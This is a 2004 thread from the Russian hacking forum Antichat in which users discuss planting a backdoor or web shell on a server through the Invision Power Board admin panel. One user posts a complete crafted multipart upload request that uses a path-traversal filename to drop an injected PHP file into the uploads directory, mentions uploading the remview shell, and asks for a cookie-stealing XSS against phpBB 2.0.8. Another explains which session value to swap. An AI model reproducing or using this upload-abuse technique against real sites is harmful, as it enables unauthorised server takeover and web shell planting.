ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Как можно залить бэкдор на сервер,если есть доступ в админку форума на Invision Power
  #1  
Старый 30.06.2004, 10:29
Аватар для Toshik
Toshik
Новичок
Регистрация: 21.06.2004
Сообщений: 11
Провел на форуме:
41885

Репутация: 0
По умолчанию Как можно залить бэкдор на сервер,если есть доступ в админку форума на Invision Power

Как можно залить бэкдор на сервер,если есть доступ в админку форума на Invision Power Board ???
На сайте www.antichat.ru/txt/IPB/index2.php - Algol рассказывает как можно это сделать через меню Manage emoticons. Внизу мы видим форму для отправки смайликов на сервер. Защиты на тип файлов для смайликов, в IPB не предусмотрено, поэтому без труда можно залить файл произвольного типа. Однако иногда это не выходит !!! И вот я хочу спросить не знает ли еще кто-нибудь о другом способе заливки бэкдора !!!
P.S заранее спасибо !!!
 
Ответить с цитированием

  #2  
Старый 01.07.2004, 13:43
Аватар для Algol
Algol
Регистрация: 29.05.2002
Сообщений: 1,793
Провел на форуме:
2050916

Репутация: 0


По умолчанию

Что значит "не выходит"??
Опиши нормально проблему.
 
Ответить с цитированием

  #3  
Старый 01.07.2004, 17:25
Аватар для
Guest
Сообщений: n/a
Провел на форуме:

Репутация:
По умолчанию

Проблема в том,что чтобы я не пытался загрузить через upload- всё пишет неудачная загрузка !!!
 
Ответить с цитированием

  #4  
Старый 08.07.2004, 17:15
Аватар для Toshik
Toshik
Новичок
Регистрация: 21.06.2004
Сообщений: 11
Провел на форуме:
41885

Репутация: 0
По умолчанию

Кстати Algol не подскажешь еще пример межсайтового скриптинга для похищения кукисов с phpbb 2.0.8
 
Ответить с цитированием

  #5  
Старый 08.07.2004, 22:53
Аватар для Algol
Algol
Регистрация: 29.05.2002
Сообщений: 1,793
Провел на форуме:
2050916

Репутация: 0


По умолчанию

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Guest @ июля 01 2004,17:25)</td></tr><tr><td id="QUOTE">Проблема в том,что чтобы я не пытался загрузить через upload- всё пишет неудачная загрузка !!![/QUOTE]<span id='postcolor'>
Кто пишет?
В какой ситуации пишет ??
Смайлики загружаются хоть куда нибудь?
Автаоры в upload загружаются ?
(И кстати в статье фокус со смйлами описан для примера, а вообще-то можно попробовать и через что-то другое заливать)

PS
Насчет phpBB - пока за него не брались, поэтому ничего сказать не могу.. Если найдешь что нить - черкани ...
 
Ответить с цитированием

  #6  
Старый 09.07.2004, 17:05
Аватар для Toshik
Toshik
Новичок
Регистрация: 21.06.2004
Сообщений: 11
Провел на форуме:
41885

Репутация: 0
По умолчанию

Объясняю подробно и понятно !!! Захожу я в админку выбираю меню загрузки смайликов,пытаюсь загрузить remview и другие шеллы,нажимаю кнопку загрузить и через несколько секунд появляется страница с надписью неудачная загрузка !!! Причём не загружаются даже смайлики,которые в принципе должны закружаться
 
Ответить с цитированием

  #7  
Старый 10.07.2004, 00:14
Аватар для Algol
Algol
Регистрация: 29.05.2002
Сообщений: 1,793
Провел на форуме:
2050916

Репутация: 0


По умолчанию

Ну правильно. В директорию смайлов запись закрыта. Но в upload то должно загружаться
 
Ответить с цитированием

  #8  
Старый 10.07.2004, 13:40
Аватар для Toshik
Toshik
Новичок
Регистрация: 21.06.2004
Сообщений: 11
Провел на форуме:
41885

Репутация: 0
По умолчанию

По пробовал залить в upload,для этого воспользовался твоей статьей захват сайтов и примером модифицированного запроса:
POST http://someSiteForum/admin.php?adses...1f59424a4e96f7 HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://someSiteForum/admin.p....ode=emo
Accept-Language: ru
Content-Type: multipart/form-data; boundary=---------------------------7d43942c405bc
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Length: 677
Pragma: no-cache
Cookie: member_id=1; pass_hash=cf20fc37b4g0be45c1336f29d444e798;

-----------------------------7d43942c405bc
Content-Disposition: form-data; name=&quot;adsess&quot;

7456d367b18da87d161f59424a4e96f7
-----------------------------7d43942c405bc
Content-Disposition: form-data; name=&quot;code&quot;

emo_upload
-----------------------------7d43942c405bc
Content-Disposition: form-data; name=&quot;act&quot;

op
-----------------------------7d43942c405bc
Content-Disposition: form-data; name=&quot;MAX_FILE_SIZE&quot;

10000000000
-----------------------------7d43942c405bc
Content-Disposition: form-data; name=&quot;FILE_UPLOAD&quot;; filename=&quot;../../uploads/myFile.php&quot;
Content-Type: application/octet-stream

&lt;% echo(&quot;Hello from injected PHP script&quot %&gt;
-----------------------------7d43942c405bc--

Ну естественно название сайта и хэш сменил, но после отправки если нажать кнопку show body in browser то открывается окно и просят ввести пароль для входа в админку !!! Я не знаю почему так получается ведь хэш то правильный у меня указан !!! И еще вот эта строчка

&lt;% echo(&quot;Hello from injected PHP script&quot %&gt;
-----------------------------7d43942c405bc--
зачем нужна можешь пояснить ???
 
Ответить с цитированием

  #9  
Старый 10.07.2004, 23:22
Аватар для Algol
Algol
Регистрация: 29.05.2002
Сообщений: 1,793
Провел на форуме:
2050916

Репутация: 0


По умолчанию

Помимо адреса и хеша, нужно еще заменить номер сессии adsess=7456d367b18da87d161f59424a4e96f7

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">&lt;% echo(&quot;Hello from injected PHP script&quot %&gt;
-----------------------------7d43942c405bc--
зачем нужна можешь пояснить ???[/QUOTE]<span id='postcolor'>
Вообще-то это внедряемый пхп-скрипт
 
Ответить с цитированием

  #10  
Старый 11.07.2004, 13:34
Аватар для Toshik
Toshik
Новичок
Регистрация: 21.06.2004
Сообщений: 11
Провел на форуме:
41885

Репутация: 0
По умолчанию

Всё изменил как надо,только теперь в твоей проге сразу открывается окно с надписью неудачная загрузка !!!
И даже не предлагают ничего загрузить вот в этом теперь и проблема !!!
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Уязвимости в Invision Power Board(U) v1.3 PF1. Вопрос. dukalis(AwP) Форумы 14 19.04.2006 19:40
химия своими руками silveran Болталка 43 11.01.2006 22:05
ЕсТь ВоПрос Guma Чаты 4 26.10.2005 21:48
Вопрос про заливку шелла в Invision Power Board DiNo Форумы 14 03.03.2005 13:40



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ